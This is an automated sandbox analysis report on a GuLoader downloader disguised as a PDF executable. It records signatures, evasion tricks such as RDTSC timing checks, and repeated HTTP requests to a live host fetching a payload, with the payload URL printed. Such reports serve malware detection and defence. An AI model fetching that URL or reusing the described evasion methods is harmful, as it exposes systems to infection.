Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMAGE000Pdf.exe

Overview

General Information

Sample name:IMAGE000Pdf.exe
Analysis ID:1548539
MD5:53441f2de2d573f3b2e4fb35c248229b
SHA1:afc840f25adfcb5873f5b69e55b2920c370a2285
SHA256:5bc4b28288f068f1c11e69b1cc94aacb4b0d2812494c1673471b890f1ce67a9e
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • IMAGE000Pdf.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)
    • IMAGE000Pdf.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\IMAGE000Pdf.exe" MD5: 53441F2DE2D573F3B2E4FB35C248229B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-04T16:16:29.112597+010020229301A Network Trojan was detected172.202.163.200443192.168.2.949795TCP
      2024-11-04T16:17:06.917480+010020229301A Network Trojan was detected172.202.163.200443192.168.2.949973TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-04T16:16:05.830050+010028032702Potentially Bad Traffic192.168.2.949980173.249.193.4880TCP
      2024-11-04T16:17:14.626933+010028032702Potentially Bad Traffic192.168.2.949972173.249.193.4880TCP
      2024-11-04T16:17:33.163894+010028032702Potentially Bad Traffic192.168.2.949974173.249.193.4880TCP
      2024-11-04T16:17:51.674002+010028032702Potentially Bad Traffic192.168.2.949975173.249.193.4880TCP
      2024-11-04T16:18:10.179042+010028032702Potentially Bad Traffic192.168.2.949976173.249.193.4880TCP
      2024-11-04T16:18:28.685872+010028032702Potentially Bad Traffic192.168.2.949977173.249.193.4880TCP
      2024-11-04T16:18:47.170399+010028032702Potentially Bad Traffic192.168.2.949978173.249.193.4880TCP
      2024-11-04T16:19:05.689254+010028032702Potentially Bad Traffic192.168.2.949979173.249.193.4880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: IMAGE000Pdf.exeAvira: detected
      Source: http://173.249.193.48/VdpAwrpsFeHTHv196.binAvira URL Cloud: Label: malware
      Source: IMAGE000Pdf.exeReversingLabs: Detection: 13%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: IMAGE000Pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: IMAGE000Pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49979 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49976 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49978 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49975 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49972 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49977 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49980 -> 173.249.193.48:80
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49973
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.9:49795
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: unknownTCP traffic detected without corresponding DNS query: 173.249.193.48
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /VdpAwrpsFeHTHv196.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 173.249.193.48Cache-Control: no-cache
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin5
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bin:
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binF
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.binH
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bind
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.249.193.48/VdpAwrpsFeHTHv196.bink
      Source: IMAGE000Pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

      System Summary

      barindex
      Source: initial sampleStatic PE information: Filename: IMAGE000Pdf.exe
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_70021B5F0_2_70021B5F
      Source: IMAGE000Pdf.exeStatic PE information: invalid certificate
      Source: IMAGE000Pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@3/11@0/1
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\kretekniske.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nso622A.tmpJump to behavior
      Source: IMAGE000Pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: IMAGE000Pdf.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile read: C:\Users\user\Desktop\IMAGE000Pdf.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile written: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
      Source: IMAGE000Pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: mshtml.pdbUGP source: IMAGE000Pdf.exe, 00000003.00000001.1803045320.0000000000649000.00000020.00000001.01000000.00000008.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_70021B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70021B5F
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI/Special instruction interceptor: Address: 50E2FD0
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI/Special instruction interceptor: Address: 2162FD0
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeRDTSC instruction interceptor: First address: 50B96E2 second address: 50B96E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA09D482426h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeRDTSC instruction interceptor: First address: 21396E2 second address: 21396E2 instructions: 0x00000000 rdtsc 0x00000002 cmp ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA09C4F4896h 0x00000008 cmp ah, ch 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx6BC0.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exe TID: 7756Thread sleep time: -50000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A86000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A94000.00000004.00000020.00020000.00000000.sdmp, IMAGE000Pdf.exe, 00000003.00000002.3194985540.0000000004A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-2498
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-2284
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_70021B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70021B5F
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeProcess created: C:\Users\user\Desktop\IMAGE000Pdf.exe "C:\Users\user\Desktop\IMAGE000Pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\IMAGE000Pdf.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      12
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager3
      File and Directory Discovery
